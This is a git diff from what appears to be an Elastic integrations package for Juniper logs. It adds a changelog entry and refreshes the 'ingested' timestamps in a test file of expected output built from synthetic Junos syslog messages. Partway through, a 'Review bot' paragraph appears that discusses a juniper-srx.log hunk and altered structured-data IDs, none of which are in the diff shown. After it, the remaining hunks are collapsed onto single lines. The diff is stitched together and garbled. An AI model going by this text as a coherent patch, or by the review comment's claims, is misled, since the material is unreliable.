diff --git a/packages/juniper/changelog.yml b/packages/juniper/changelog.yml
index 7431c6efa40..0d92fd3d432 100644
--- a/packages/juniper/changelog.yml
+++ b/packages/juniper/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.0.6"
+ changes:
+ - description: Change test public IPs to the supported subset
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2327
 - version: "1.0.5"
 changes:
 - description: Deprecate in favor of new specific packages
diff --git a/packages/juniper/data_stream/junos/_dev/test/pipeline/test-generated.log-expected.json b/packages/juniper/data_stream/junos/_dev/test/pipeline/test-generated.log-expected.json
index e4a57e873cc..fba6e68bbbe 100644
--- a/packages/juniper/data_stream/junos/_dev/test/pipeline/test-generated.log-expected.json
+++ b/packages/juniper/data_stream/junos/_dev/test/pipeline/test-generated.log-expected.json
@@ -3,7 +3,7 @@
 {
 "message": "Jan 29 06:09:59 ceroinBC.exe[6713]: RPD_SCHED_TASK_LONGRUNTIME: : exe ran for 7309(5049)",
 "event": {
- "ingested": "2021-12-06T12:25:15.833781878Z"
+ "ingested": "2021-12-10T10:13:45.067851400Z"
 },
 "ecs": {
 "version": "1.12.0"
@@ -15,7 +15,7 @@
 {
 "message": "Feb 12 13:12:33 DCD_FILTER_LIB_ERROR message repeated [7608]: llu: Filter library initialization failed",
 "event": {
- "ingested": "2021-12-06T12:25:15.833807005Z"
+ "ingested": "2021-12-10T10:13:45.067872Z"
 },
 "ecs": {
 "version": "1.12.0"
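Review bot: On both new lines of the juniper-srx.log hunk the structured-data ID has been rewritten from `junos@2636.1.1.1.2.86` / `junos@2636.1.1.1.2.134` to `junos@67.43.156.15`, which corrupts the RFC 5424 SD-ID rather than replacing an IP address: `2636` is Juniper's IANA enterprise number and the dotted suffix is an OID, not an IPv4 address, so the bulk substitution appears to have matched it by mistake. The sample no longer resembles what an SRX emits, and if the junos pipeline's dissect/grok (not visible here) anchors on `junos@2636`, this docker sample will stop parsing in system tests. Keep only the `destination-address="67.43.156.13"` change and restore the SD-IDs, i.e. `[junos@2636.1.1.1.2.86 source-address="192.168.1.100"` on the first line and `[junos@2636.1.1.1.2.134 source-address="10.0.0.1"` on the second.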
@@ -27,7 +27,7 @@ { "message": "Feb 26 20:15:08 MIB2D_TRAP_SEND_FAILURE: restart [6747]: sum: uaerat: cancel: success", "event": { - "ingested": "2021-12-06T12:25:15.833814229Z" + "ingested": "2021-12-10T10:13:45.067881900Z" }, "ecs": { "version": "1.12.0" @@ -39,7 +39,7 @@ { "message": "Mar 12 03:17:42 seq olorema6148.www.localdomain: fug5500.www.domain IFP trace\u003e node: dqu", "event": { - "ingested": "2021-12-06T12:25:15.833819378Z" + "ingested": "2021-12-10T10:13:45.067891500Z" }, "ecs": { "version": "1.12.0" @@ -51,7 +51,7 @@ { "message": "Mar 26 10:20:16 ssb SNMPD_CONTEXT_ERROR: [7400]: emq: isiu: success in 6237 context 5367", "event": { - "ingested": "2021-12-06T12:25:15.833824047Z" + "ingested": "2021-12-10T10:13:45.067900900Z" }, "ecs": { "version": "1.12.0" @@ -63,7 +63,7 @@ { "message": "Apr 9 17:22:51 RPD_KRT_IFL_CELL_RELAY_MODE_UNSPECIFIED: restart [7618]: ionul: ifl : nibus, unknown", "event": { - "ingested": "2021-12-06T12:25:15.833848894Z" + "ingested": "2021-12-10T10:13:45.067910Z" }, "ecs": { "version": "1.12.0" @@ -75,7 +75,7 @@ { "message": "Apr 24 00:25:25 CHASSISD_SNMP_TRAP10 message repeated [1284]: ume: SNMP trap: failure: ono", "event": { - "ingested": "2021-12-06T12:25:15.833858041Z" + "ingested": "2021-12-10T10:13:45.067919200Z" }, "ecs": { "version": "1.12.0" @@ -87,7 +87,7 @@ { "message": "May 8 07:27:59 sunt prehen6218.www.localhost: onse.exe[254]: RPD_KRT_IFL_CELL_RELAY_MODE_INVALID: : ifl : inibusBo, failure", "event": { - "ingested": "2021-12-06T12:25:15.833863651Z" + "ingested": "2021-12-10T10:13:45.067928300Z" }, "ecs": { "version": "1.12.0" @@ -99,7 +99,7 @@ { "message": "May 22 14:30:33 iamquis quirat6972.www5.lan: isc.exe[3237]: SNMPD_USER_ERROR: : conseq: unknown in 6404 user 'atiset' 4068", "event": { - "ingested": "2021-12-06T12:25:15.833868591Z" + "ingested": "2021-12-10T10:13:45.067937600Z" }, "ecs": { "version": "1.12.0" 
@@ -111,7 +111,7 @@ { "message": "Jun 5 21:33:08 fpc9 RPD_TASK_REINIT: [4621]: lita: Reinitializing", "event": { - "ingested": "2021-12-06T12:25:15.833873209Z" + "ingested": "2021-12-10T10:13:45.067943700Z" }, "ecs": { "version": "1.12.0" @@ -123,7 +123,7 @@ { "message": "Jun 20 04:35:42 fpc4 LOGIN_FAILED: [2227]: oinBC: Login failed for user quameius from host ipsumdol4488.api.localdomain", "event": { - "ingested": "2021-12-06T12:25:15.833877377Z" + "ingested": "2021-12-10T10:13:45.067950200Z" }, "ecs": { "version": "1.12.0" @@ -135,7 +135,7 @@ { "message": "Jul 4 11:38:16 NASD_PPP_SEND_PARTIAL: restart [3994]: aper: Unable to send all of message: santiumd", "event": { - "ingested": "2021-12-06T12:25:15.833881635Z" + "ingested": "2021-12-10T10:13:45.067960Z" }, "ecs": { "version": "1.12.0" @@ -147,7 +147,7 @@ { "message": "Jul 18 18:40:50 UI_COMMIT_AT_FAILED message repeated [7440]: temqu: success, minimav", "event": { - "ingested": "2021-12-06T12:25:15.833885813Z" + "ingested": "2021-12-10T10:13:45.067969400Z" }, "ecs": { "version": "1.12.0" @@ -159,7 +159,7 @@ { "message": "Aug 2 01:43:25 rnatur ofdeFin7811.lan: emipsumd.exe[5020]: BOOTPD_NEW_CONF: : New configuration installed", "event": { - "ingested": "2021-12-06T12:25:15.833915318Z" + "ingested": "2021-12-10T10:13:45.067978700Z" }, "ecs": { "version": "1.12.0" @@ -171,7 +171,7 @@ { "message": "Aug 16 08:45:59 RPD_RIP_JOIN_MULTICAST message repeated [60]: onemulla: Unable to join multicast group enp0s4292: unknown", "event": { - "ingested": "2021-12-06T12:25:15.833932050Z" + "ingested": "2021-12-10T10:13:45.067988100Z" }, "ecs": { "version": "1.12.0" @@ -183,7 +183,7 @@ { "message": "Aug 30 15:48:33 FSAD_TERMINATED_CONNECTION: restart [6703]: xea: Open file ites` closed due to unknown", "event": { - "ingested": "2021-12-06T12:25:15.833939193Z" + "ingested": "2021-12-10T10:13:45.067994600Z" }, "ecs": { "version": "1.12.0" 
@@ -195,7 +195,7 @@ { "message": "Sep 13 22:51:07 RPD_KRT_IFL_GENERATION message repeated [5539]: eri: ifl lo2169 generation mismatch -- unknown", "event": { - "ingested": "2021-12-06T12:25:15.833944814Z" + "ingested": "2021-12-10T10:13:45.068001300Z" }, "ecs": { "version": "1.12.0" @@ -207,7 +207,7 @@ { "message": "Sep 28 05:53:42 cfeb UI_COMMIT_ROLLBACK_FAILED: [3453]: avolu: Automatic rollback failed", "event": { - "ingested": "2021-12-06T12:25:15.833949623Z" + "ingested": "2021-12-10T10:13:45.068018400Z" }, "ecs": { "version": "1.12.0" @@ -219,7 +219,7 @@ { "message": "Oct 12 12:56:16 mquisn.exe[3993]: RMOPD_usage : failure: midest", "event": { - "ingested": "2021-12-06T12:25:15.833953811Z" + "ingested": "2021-12-10T10:13:45.068028Z" }, "ecs": { "version": "1.12.0" @@ -231,7 +231,7 @@ { "message": "Oct 26 19:58:50 undeomni.exe[4938]: RPD_ISIS_LSPCKSUM: : IS-IS 715 LSP checksum error, interface enp0s1965, LSP id tasun, sequence 3203, checksum eratv, lifetime ipsa", "event": { - "ingested": "2021-12-06T12:25:15.833958129Z" + "ingested": "2021-12-10T10:13:45.068037100Z" }, "ecs": { "version": "1.12.0" @@ -243,7 +243,7 @@ { "message": "Nov 10 03:01:24 kmd: restart ", "event": { - "ingested": "2021-12-06T12:25:15.833962337Z" + "ingested": "2021-12-10T10:13:45.068046400Z" }, "ecs": { "version": "1.12.0" @@ -255,7 +255,7 @@ { "message": "Nov 24 10:03:59 ever.exe[6463]: LOGIN_FAILED: : Login failed for user atq from host erspi4926.www5.test", "event": { - "ingested": "2021-12-06T12:25:15.833966504Z" + "ingested": "2021-12-10T10:13:45.068055500Z" }, "ecs": { "version": "1.12.0" @@ -267,7 +267,7 @@ { "message": "Dec 8 17:06:33 CHASSISD_MBUS_ERROR message repeated [72]: iadese: nisiu imad: management bus failed sanity test", "event": { - "ingested": "2021-12-06T12:25:15.833970822Z" + "ingested": "2021-12-10T10:13:45.068064400Z" }, "ecs": { "version": "1.12.0" 
@@ -279,7 +279,7 @@ { "message": "Dec 23 00:09:07 niamquis.exe[1471]: TFTPD_NAK_ERR : nak error ptatems, 357", "event": { - "ingested": "2021-12-06T12:25:15.833974750Z" + "ingested": "2021-12-10T10:13:45.068073800Z" }, "ecs": { "version": "1.12.0" @@ -291,7 +291,7 @@ { "message": "Jan 6 07:11:41 UI_DUPLICATE_UID: restart [3350]: atqu: Users naturau have the same UID olorsita", "event": { - "ingested": "2021-12-06T12:25:15.833978747Z" + "ingested": "2021-12-10T10:13:45.068082900Z" }, "ecs": { "version": "1.12.0" @@ -303,7 +303,7 @@ { "message": "Jan 20 14:14:16 piscivel.exe[4753]: TFTPD_CREATE_ERR: : check_space unknown", "event": { - "ingested": "2021-12-06T12:25:15.833983376Z" + "ingested": "2021-12-10T10:13:45.068092300Z" }, "ecs": { "version": "1.12.0" @@ -315,7 +315,7 @@ { "message": "Feb 3 21:16:50 fpc4 RPD_START: [1269]: riat: Start 181 version version built 7425", "event": { - "ingested": "2021-12-06T12:25:15.833987634Z" + "ingested": "2021-12-10T10:13:45.068101400Z" }, "ecs": { "version": "1.12.0" @@ -327,7 +327,7 @@ { "message": "Feb 18 04:19:24 fpc2 COSMAN: : uptasnul: delete class_to_ifl table 2069, ifl 3693", "event": { - "ingested": "2021-12-06T12:25:15.833991682Z" + "ingested": "2021-12-10T10:13:45.068110800Z" }, "ecs": { "version": "1.12.0" @@ -339,7 +339,7 @@ { "message": "Mar 4 11:21:59 orum oinBCSed3073.www.lan: ilm.exe[3193]: SNMPD_TRAP_QUEUE_MAX_ATTEMPTS: : fugiatqu: after 4003 attempts, deleting 4568 traps queued to exercita", "event": { - "ingested": "2021-12-06T12:25:15.833995539Z" + "ingested": "2021-12-10T10:13:45.068120300Z" }, "ecs": { "version": "1.12.0" @@ -351,7 +351,7 @@ { "message": "Mar 18 18:24:33 TFTPD_BIND_ERR: restart [1431]: ntut: bind: failure", "event": { - "ingested": "2021-12-06T12:25:15.833999346Z" + "ingested": "2021-12-10T10:13:45.068129Z" }, "ecs": { "version": "1.12.0" 
@@ -363,7 +363,7 @@ { "message": "Apr 2 01:27:07 lite ugia517.api.host: doei.exe[7073]: RPD_LDP_SESSIONDOWN: : LDP session 10.88.126.165 is down, failure", "event": { - "ingested": "2021-12-06T12:25:15.834003083Z" + "ingested": "2021-12-10T10:13:45.068132900Z" }, "ecs": { "version": "1.12.0" @@ -375,7 +375,7 @@ { "message": "Apr 16 08:29:41 fpc6 SNMPD_CONTEXT_ERROR: [180]: eturadip: ent: unknown in 5848 context 316", "event": { - "ingested": "2021-12-06T12:25:15.834007Z" + "ingested": "2021-12-10T10:13:45.068139Z" }, "ecs": { "version": "1.12.0" @@ -387,7 +387,7 @@ { "message": "Apr 30 15:32:16 NASD_CHAP_INVALID_CHAP_IDENTIFIER message repeated [796]: iumdo: lo2721: received aturv expected CHAP ID: ectetura", "event": { - "ingested": "2021-12-06T12:25:15.834010858Z" + "ingested": "2021-12-10T10:13:45.068148500Z" }, "ecs": { "version": "1.12.0" @@ -399,7 +399,7 @@ { "message": "May 14 22:34:50 UI_LOAD_EVENT message repeated [6342]: seq: User 'moll' is performing a 'allow'", "event": { - "ingested": "2021-12-06T12:25:15.834017971Z" + "ingested": "2021-12-10T10:13:45.068157900Z" }, "ecs": { "version": "1.12.0" @@ -411,7 +411,7 @@ { "message": "May 29 05:37:24 fdeFin.exe[4053]: SNMP_TRAP_TRACE_ROUTE_TEST_FAILED : traceRouteCtlOwnerIndex = 1450, traceRouteCtlTestName = edic", "event": { - "ingested": "2021-12-06T12:25:15.834022069Z" + "ingested": "2021-12-10T10:13:45.068166400Z" }, "ecs": { "version": "1.12.0" @@ -423,7 +423,7 @@ { "message": "Jun 12 12:39:58 SNMPD_RTSLIB_ASYNC_EVENT: restart [508]: uae: oremip: sequence mismatch failure", "event": { - "ingested": "2021-12-06T12:25:15.834025896Z" + "ingested": "2021-12-10T10:13:45.068172600Z" }, "ecs": { "version": "1.12.0" @@ -435,7 +435,7 @@ { "message": "Jun 26 19:42:33 tesse olupta2743.internal.localdomain: ine.exe[3181]: BOOTPD_TIMEOUT: : Timeout success unreasonable", "event": { - "ingested": "2021-12-06T12:25:15.834029713Z" + "ingested": "2021-12-10T10:13:45.068178900Z" }, "ecs": { "version": "1.12.0" 
@@ -447,7 +447,7 @@ { "message": "Jul 11 02:45:07 NASD_RADIUS_MESSAGE_UNEXPECTED message repeated [33]: abore: Unknown response from RADIUS server: unknown", "event": { - "ingested": "2021-12-06T12:25:15.834033520Z" + "ingested": "2021-12-10T10:13:45.068185800Z" }, "ecs": { "version": "1.12.0" @@ -459,7 +459,7 @@ { "message": "Jul 25 09:47:41 PWC_LOCKFILE_BAD_FORMAT: restart [3426]: illum: PID lock file has bad format: eprehe", "event": { - "ingested": "2021-12-06T12:25:15.834037107Z" + "ingested": "2021-12-10T10:13:45.068195100Z" }, "ecs": { "version": "1.12.0" @@ -471,7 +471,7 @@ { "message": "Aug 8 16:50:15 snostr.exe[1613]: RPD_KRT_AFUNSUPRT : tec: received itaspe message with unsupported address family 4176", "event": { - "ingested": "2021-12-06T12:25:15.834040774Z" + "ingested": "2021-12-10T10:13:45.068204100Z" }, "ecs": { "version": "1.12.0" @@ -483,7 +483,7 @@ { "message": "Aug 22 23:52:50 oreeufug.exe[6086]: PWC_PROCESS_FORCED_HOLD : Process plicaboN forcing hold down of child 619 until signal", "event": { - "ingested": "2021-12-06T12:25:15.834044371Z" + "ingested": "2021-12-10T10:13:45.068213200Z" }, "ecs": { "version": "1.12.0" @@ -495,7 +495,7 @@ { "message": "Sep 6 06:55:24 MIB2D_IFL_IFINDEX_FAILURE message repeated [4115]: tiu: SNMP index assigned to wri changed from 3902 to unknown", "event": { - "ingested": "2021-12-06T12:25:15.834048027Z" + "ingested": "2021-12-10T10:13:45.068222300Z" }, "ecs": { "version": "1.12.0" @@ -507,7 +507,7 @@ { "message": "Sep 20 13:57:58 mwr cia5990.api.localdomain: pitlabo.exe[3498]: UI_DBASE_MISMATCH_MAJOR: : Database header major version number mismatch for file 'ende': expecting 6053, got 4884", "event": { - "ingested": "2021-12-06T12:25:15.834051584Z" + "ingested": "2021-12-10T10:13:45.068231500Z" }, "ecs": { "version": "1.12.0" 
@@ -519,7 +519,7 @@ { "message": "Oct 4 21:00:32 iuntN utfugi851.www5.invalid: nul.exe[1005]: SNMPD_VIEW_INSTALL_DEFAULT: : eetdo: success installing default 1243 view 5146", "event": { - "ingested": "2021-12-06T12:25:15.834055171Z" + "ingested": "2021-12-10T10:13:45.068240600Z" }, "ecs": { "version": "1.12.0" @@ -531,7 +531,7 @@ { "message": "Oct 19 04:03:07 DCD_PARSE_STATE_EMERGENCY message repeated [2498]: uptatem: An unhandled state was encountered during interface parsing", "event": { - "ingested": "2021-12-06T12:25:15.834058667Z" + "ingested": "2021-12-10T10:13:45.068249800Z" }, "ecs": { "version": "1.12.0" @@ -543,7 +543,7 @@ { "message": "Nov 2 11:05:41 loremagn acons3820.internal.home: ain.exe[7192]: LOGIN_PAM_MAX_RETRIES: : Too many retries while authenticating user iquipex", "event": { - "ingested": "2021-12-06T12:25:15.834062394Z" + "ingested": "2021-12-10T10:13:45.068258800Z" }, "ecs": { "version": "1.12.0" @@ -555,7 +555,7 @@ { "message": "Nov 16 18:08:15 onorume.exe[3290]: BOOTPD_NO_BOOTSTRING : No boot string found for type veleu", "event": { - "ingested": "2021-12-06T12:25:15.834066121Z" + "ingested": "2021-12-10T10:13:45.068266900Z" }, "ecs": { "version": "1.12.0" @@ -567,7 +567,7 @@ { "message": "Dec 1 01:10:49 eirured sequamn5243.mail.home: sshd: sshd: SSHD_LOGIN_FAILED: Login failed for user 'ciatisun' from host '10.252.209.246'.", "event": { - "ingested": "2021-12-06T12:25:15.834069728Z" + "ingested": "2021-12-10T10:13:45.068270800Z" }, "ecs": { "version": "1.12.0" @@ -579,7 +579,7 @@ { "message": "Dec 15 08:13:24 COS: restart : Received FC-\u003eQ map, caecat", "event": { - "ingested": "2021-12-06T12:25:15.834073445Z" + "ingested": "2021-12-10T10:13:45.068276900Z" }, "ecs": { "version": "1.12.0" 
@@ -591,7 +591,7 @@ { "message": "Dec 29 15:15:58 cgatool message repeated : nvolupta: generated address is success", "event": { - "ingested": "2021-12-06T12:25:15.834077042Z" + "ingested": "2021-12-10T10:13:45.068282900Z" }, "ecs": { "version": "1.12.0" @@ -603,7 +603,7 @@ { "message": "Jan 12 22:18:32 CHASSISD_SNMP_TRAP6 message repeated [4667]: idolor: SNMP trap generated: success (les)", "event": { - "ingested": "2021-12-06T12:25:15.834080839Z" + "ingested": "2021-12-10T10:13:45.068290600Z" }, "ecs": { "version": "1.12.0" @@ -615,7 +615,7 @@ { "message": "Jan 27 05:21:06 ssb FLOW_REASSEMBLE_SUCCEED: : Packet merged source 10.102.228.136 destination 10.151.136.250 ipid upt succeed", "event": { - "ingested": "2021-12-06T12:25:15.834084726Z" + "ingested": "2021-12-10T10:13:45.068300Z" }, "ecs": { "version": "1.12.0" @@ -627,7 +627,7 @@ { "message": "Feb 10 12:23:41 DFWD_PARSE_FILTER_EMERGENCY message repeated [2037]: serrorsi: tsedquia encountered errors while parsing filter index file", "event": { - "ingested": "2021-12-06T12:25:15.834088373Z" + "ingested": "2021-12-10T10:13:45.068309200Z" }, "ecs": { "version": "1.12.0" @@ -639,7 +639,7 @@ { "message": "Feb 24 19:26:15 remips laboreet5949.mail.test: tesse.exe[4358]: RPD_LDP_SESSIONDOWN: : LDP session 10.148.255.126 is down, unknown", "event": { - "ingested": "2021-12-06T12:25:15.834092040Z" + "ingested": "2021-12-10T10:13:45.068318500Z" }, "ecs": { "version": "1.12.0" @@ -651,7 +651,7 @@ { "message": "Mar 11 02:28:49 fpc2 NASD_CHAP_REPLAY_ATTACK_DETECTED: [mipsumqu]: turad: eth680.6195: received doloremi unknown.iciatis", "event": { - "ingested": "2021-12-06T12:25:15.834095747Z" + "ingested": "2021-12-10T10:13:45.068327700Z" }, "ecs": { "version": "1.12.0" 
@@ -663,7 +663,7 @@ { "message": "Mar 25 09:31:24 rema mcol7795.domain: mquis lsys_ssam_handler: : processing lsys root-logical-system tur", "event": { - "ingested": "2021-12-06T12:25:15.834099444Z" + "ingested": "2021-12-10T10:13:45.068334300Z" }, "ecs": { "version": "1.12.0" @@ -675,7 +675,7 @@ { "message": "Apr 8 16:33:58 UI_LOST_CONN message repeated [7847]: loreeuf: Lost connection to daemon orainci", "event": { - "ingested": "2021-12-06T12:25:15.834103371Z" + "ingested": "2021-12-10T10:13:45.068340600Z" }, "ecs": { "version": "1.12.0" @@ -687,7 +687,7 @@ { "message": "Apr 22 23:36:32 PWC_PROCESS_HOLD: restart [1791]: itse: Process lapari holding down child 2702 until signal", "event": { - "ingested": "2021-12-06T12:25:15.834106838Z" + "ingested": "2021-12-10T10:13:45.068349900Z" }, "ecs": { "version": "1.12.0" @@ -699,7 +699,7 @@ { "message": "May 7 06:39:06 undeo ficiade4365.mail.domain: norum.exe[4443]: LIBSERVICED_SOCKET_BIND: : dantium: unable to bind socket ors: failure", "event": { - "ingested": "2021-12-06T12:25:15.834110565Z" + "ingested": "2021-12-10T10:13:45.068359Z" }, "ecs": { "version": "1.12.0" @@ -711,7 +711,7 @@ { "message": "May 21 13:41:41 liq eleumiu2852.lan: mfugiat.exe[3946]: LOGIN_FAILED: : Login failed for user olu from host mSect5899.domain", "event": { - "ingested": "2021-12-06T12:25:15.834114071Z" + "ingested": "2021-12-10T10:13:45.068368Z" }, "ecs": { "version": "1.12.0" @@ -723,7 +723,7 @@ { "message": "Jun 4 20:44:15 idolo.exe[6535]: MIB2D_IFL_IFINDEX_FAILURE: : SNMP index assigned to deseru changed from 6460 to unknown", "event": { - "ingested": "2021-12-06T12:25:15.834117568Z" + "ingested": "2021-12-10T10:13:45.068377Z" }, "ecs": { "version": "1.12.0" @@ -735,7 +735,7 @@ { "message": "Jun 19 03:46:49 modtempo.exe[5276]: CHASSISD_RELEASE_MASTERSHIP: : Release mastership notification", "event": { - "ingested": "2021-12-06T12:25:15.834121225Z" + "ingested": "2021-12-10T10:13:45.068386300Z" }, "ecs": { "version": "1.12.0" 
@@ -747,7 +747,7 @@ { "message": "Jul 3 10:49:23 fpc4 PWC_PROCESS_HOLD: [3450]: dexea: Process aturExc holding down child 7343 until signal", "event": { - "ingested": "2021-12-06T12:25:15.834124711Z" + "ingested": "2021-12-10T10:13:45.068395300Z" }, "ecs": { "version": "1.12.0" @@ -759,7 +759,7 @@ { "message": "Jul 17 17:51:58 ame.exe[226]: SERVICED_RTSOCK_SEQUENCE : boreet: routing socket sequence error, unknown", "event": { - "ingested": "2021-12-06T12:25:15.834128709Z" + "ingested": "2021-12-10T10:13:45.068406900Z" }, "ecs": { "version": "1.12.0" @@ -771,7 +771,7 @@ { "message": "Aug 1 00:54:32 consect6919.mail.localdomain iset.exe[940]: idpinfo: urere", "event": { - "ingested": "2021-12-06T12:25:15.834132616Z" + "ingested": "2021-12-10T10:13:45.068464200Z" }, "ecs": { "version": "1.12.0" @@ -783,7 +783,7 @@ { "message": "Aug 15 07:57:06 RPD_KRT_NOIFD: restart [4822]: oreeufug: No device 5020 for interface lo4593", "event": { - "ingested": "2021-12-06T12:25:15.834136303Z" + "ingested": "2021-12-10T10:13:45.068473Z" }, "ecs": { "version": "1.12.0" @@ -795,7 +795,7 @@ { "message": "Aug 29 14:59:40 eprehen oinB3432.api.invalid: citatio.exe[5029]: craftd: , unknown", "event": { - "ingested": "2021-12-06T12:25:15.834140231Z" + "ingested": "2021-12-10T10:13:45.068477300Z" }, "ecs": { "version": "1.12.0" @@ -807,7 +807,7 @@ { "message": "Sep 12 22:02:15 ACCT_CU_RTSLIB_error message repeated [7583]: eetd: liquide getting class usage statistics for interface enp0s2674: success", "event": { - "ingested": "2021-12-06T12:25:15.834144008Z" + "ingested": "2021-12-10T10:13:45.068481900Z" }, "ecs": { "version": "1.12.0" @@ -819,7 +819,7 @@ { "message": "Sep 27 05:04:49 userro oree nimadmi7341.www.home RT_FLOW - kmd [", "event": { - "ingested": "2021-12-06T12:25:15.834147815Z" + "ingested": "2021-12-10T10:13:45.068485800Z" }, "ecs": { "version": "1.12.0" 
@@ -831,7 +831,7 @@ { "message": "Oct 11 12:07:23 LOGIN_PAM_NONLOCAL_USER: restart [686]: rauto: User rese authenticated but has no local login ID", "event": { - "ingested": "2021-12-06T12:25:15.834151722Z" + "ingested": "2021-12-10T10:13:45.068492100Z" }, "ecs": { "version": "1.12.0" @@ -843,7 +843,7 @@ { "message": "Oct 25 19:09:57 doconse.exe[6184]: RPD_KRT_NOIFD : No device 5991 for interface enp0s7694", "event": { - "ingested": "2021-12-06T12:25:15.834155419Z" + "ingested": "2021-12-10T10:13:45.068497900Z" }, "ecs": { "version": "1.12.0" @@ -855,7 +855,7 @@ { "message": "Nov 9 02:12:32 quidolor1064.www.domain: uspinfo: : flow_print_session_summary_output received rcita", "event": { - "ingested": "2021-12-06T12:25:15.834159096Z" + "ingested": "2021-12-10T10:13:45.068505500Z" }, "ecs": { "version": "1.12.0" @@ -867,7 +867,7 @@ { "message": "Nov 23 09:15:06 RPD_TASK_REINIT: restart [1810]: mfugi: Reinitializing", "event": { - "ingested": "2021-12-06T12:25:15.834164206Z" + "ingested": "2021-12-10T10:13:45.068514300Z" }, "ecs": { "version": "1.12.0" @@ -879,7 +879,7 @@ { "message": "Dec 7 16:17:40 inibusBo.exe[2509]: ECCD_TRACE_FILE_OPEN_FAILED : allow: failure", "event": { - "ingested": "2021-12-06T12:25:15.834168173Z" + "ingested": "2021-12-10T10:13:45.068520900Z" }, "ecs": { "version": "1.12.0" @@ -891,7 +891,7 @@ { "message": "Dec 21 23:20:14 ECCD_TRACE_FILE_OPEN_FAILED message repeated [2815]: rudexer: accept: unknown", "event": { - "ingested": "2021-12-06T12:25:15.834172080Z" + "ingested": "2021-12-10T10:13:45.068530400Z" }, "ecs": { "version": "1.12.0" @@ -903,7 +903,7 @@ { "message": "Jan 5 06:22:49 eseosqu oeius641.api.home: laud.exe[913]: LOGIN_FAILED: : Login failed for user turQ from host tod6376.mail.host", "event": { - "ingested": "2021-12-06T12:25:15.834175767Z" + "ingested": "2021-12-10T10:13:45.068536900Z" }, "ecs": { "version": "1.12.0" 
@@ -915,7 +915,7 @@ { "message": "Jan 19 13:25:23 ine.exe[1578]: FSAD_CONNTIMEDOUT : Connection timed out to the client (oreve2538.www.localdomain, 10.44.24.103) having request type reprehen", "event": { - "ingested": "2021-12-06T12:25:15.834179334Z" + "ingested": "2021-12-10T10:13:45.068543600Z" }, "ecs": { "version": "1.12.0" @@ -927,7 +927,7 @@ { "message": "Feb 2 20:27:57 UI_SCHEMA_SEQUENCE_ERROR: restart [734]: rinre: Schema sequence number mismatch", "event": { - "ingested": "2021-12-06T12:25:15.834182981Z" + "ingested": "2021-12-10T10:13:45.068553100Z" }, "ecs": { "version": "1.12.0" @@ -939,7 +939,7 @@ { "message": "Feb 17 03:30:32 LIBJNX_EXEC_PIPE: restart [946]: olors: Unable to create pipes for command 'deny': unknown", "event": { - "ingested": "2021-12-06T12:25:15.834186658Z" + "ingested": "2021-12-10T10:13:45.068561900Z" }, "ecs": { "version": "1.12.0" @@ -951,7 +951,7 @@ { "message": "Mar 3 10:33:06 UI_DBASE_MISMATCH_EXTENT: restart [4686]: isnost: Database header extent mismatch for file 'lumdolor': expecting 559, got 7339", "event": { - "ingested": "2021-12-06T12:25:15.834190244Z" + "ingested": "2021-12-10T10:13:45.068568400Z" }, "ecs": { "version": "1.12.0" @@ -963,7 +963,7 @@ { "message": "Mar 17 17:35:40 NASD_usage message repeated [7744]: eumfu: unknown: quidex", "event": { - "ingested": "2021-12-06T12:25:15.834193831Z" + "ingested": "2021-12-10T10:13:45.068577700Z" }, "ecs": { "version": "1.12.0" @@ -975,7 +975,7 @@ { "message": "Apr 1 00:38:14 /kmd: ", "event": { - "ingested": "2021-12-06T12:25:15.834197328Z" + "ingested": "2021-12-10T10:13:45.068586800Z" }, "ecs": { "version": "1.12.0" @@ -987,7 +987,7 @@ { "message": "Apr 15 07:40:49 sshd message repeated : very-high: can't get client address: unknown", "event": { - "ingested": "2021-12-06T12:25:15.834201766Z" + "ingested": "2021-12-10T10:13:45.068596200Z" }, "ecs": { "version": "1.12.0" 
@@ -999,7 +999,7 @@ { "message": "Apr 29 14:43:23 fpc4 RPD_LDP_NBRUP: [4279]: stlaboru: LDP neighbor 10.248.68.242 (eth1282) is success", "event": { - "ingested": "2021-12-06T12:25:15.834205583Z" + "ingested": "2021-12-10T10:13:45.068602300Z" }, "ecs": { "version": "1.12.0" @@ -1011,7 +1011,7 @@ { "message": "May 13 21:45:57 uun iduntutl4723.example: uel.exe[5770]: SNMPD_TRAP_QUEUE_DRAINED: : metco: traps queued to vel sent successfully", "event": { - "ingested": "2021-12-06T12:25:15.834209180Z" + "ingested": "2021-12-10T10:13:45.068608600Z" }, "ecs": { "version": "1.12.0" @@ -1023,7 +1023,7 @@ { "message": "May 28 04:48:31 fpc8 ECCD_PCI_WRITE_FAILED: [4837]: radip: cancel: success", "event": { - "ingested": "2021-12-06T12:25:15.834212777Z" + "ingested": "2021-12-10T10:13:45.068618Z" }, "ecs": { "version": "1.12.0" @@ -1035,7 +1035,7 @@ { "message": "Jun 11 11:51:06 TFTPD_RECVCOMPLETE_INFO message repeated [7501]: piciatis: Received 3501 blocks of 5877 size for file 'tatisetq'", "event": { - "ingested": "2021-12-06T12:25:15.834216293Z" + "ingested": "2021-12-10T10:13:45.068627200Z" }, "ecs": { "version": "1.12.0" @@ -1047,7 +1047,7 @@ { "message": "Jun 25 18:53:40 usp_trace_ipc_reconnect message repeated illum.exe:USP trace client cannot reconnect to server", "event": { - "ingested": "2021-12-06T12:25:15.834219980Z" + "ingested": "2021-12-10T10:13:45.068636500Z" }, "ecs": { "version": "1.12.0" @@ -1059,7 +1059,7 @@ { "message": "Jul 10 01:56:14 amnis atevelit2799.internal.host: tatiset.exe IFP trace\u003e BCHIP: : cannot write ucode mask reg", "event": { - "ingested": "2021-12-06T12:25:15.834224088Z" + "ingested": "2021-12-10T10:13:45.068645700Z" }, "ecs": { "version": "1.12.0" @@ -1071,7 +1071,7 @@ { "message": "Jul 24 08:58:48 RPD_MPLS_LSP_DOWN message repeated [5094]: moditemp: MPLS LSP eth2042 unknown", "event": { - "ingested": "2021-12-06T12:25:15.834228316Z" + "ingested": "2021-12-10T10:13:45.068652300Z" }, "ecs": { "version": "1.12.0" 
